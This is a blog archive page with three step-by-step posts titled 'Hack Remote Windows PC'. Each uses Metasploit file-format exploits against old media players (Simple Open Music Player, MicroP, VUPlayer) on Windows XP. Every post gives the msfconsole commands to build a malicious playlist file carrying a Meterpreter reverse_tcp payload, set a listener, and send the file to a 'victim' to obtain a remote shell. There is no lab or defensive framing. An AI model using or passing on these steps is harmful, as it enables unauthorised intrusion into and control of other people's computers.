Raj Chandel's Blog
Archive for May, 2012
Hack Remote Windows PC using S.O.M.P.L 1.0 Player Buffer Overflow
011 months ago
This module exploits a buffer overflow in Simple Open Music Player v1.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.
Exploit Targets
Simple Open Music Player v1.0
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/somplplayer_m3u
Msf exploit (somplplayer_m3u)>set payload windows/meterpreter/reverse_tcp
Msf exploit (somplplayer_m3u)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (somplplayer_m3u)>exploit
After we successfully generate the malicious MP3 File, it will stored on your local computer
/root/.msf4/local/msf.m3u
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Hack Remote Windows PC using MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
011 months ago
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based buffer overflow occurs when the content of a .mppl file gets copied onto the stack, which overwrites the lpFile Name parameter of a Create FileA () function, and results arbitrary code execution under the context of the user.
Exploit Targets
MicroP 0.1.1.1600
Windows XP SP 2
Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/microp_mppl
Msf exploit (microp_mppl)>set payload windows/meterpreter/reverse_tcp
Msf exploit (microp_mppl)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (microp_mppl)>exploit
After we successfully generate the malicious MPPL File, it will stored on your local computer
/root/.msf4/local/msf.mppl
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.mppl files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Hack Remote Windows PC using VUPlayer M3U Buffer Overflow
011 months ago
This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted m3u file, and buffer is overwritten allowing for the execution of arbitrary code
Exploit Targets
VUPlayer 2.49
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/vuplayer_m3u
Msf exploit (vuplayer_m3u)>set payload windows/meterpreter/reverse_tcp
Msf exploit (vuplayer_m3u)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (vuplayer_m3u)>exploit
After we successfully generate the malicious MP3 File, it will stored on your local computer
/root/.msf4/local/msf.m3u
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
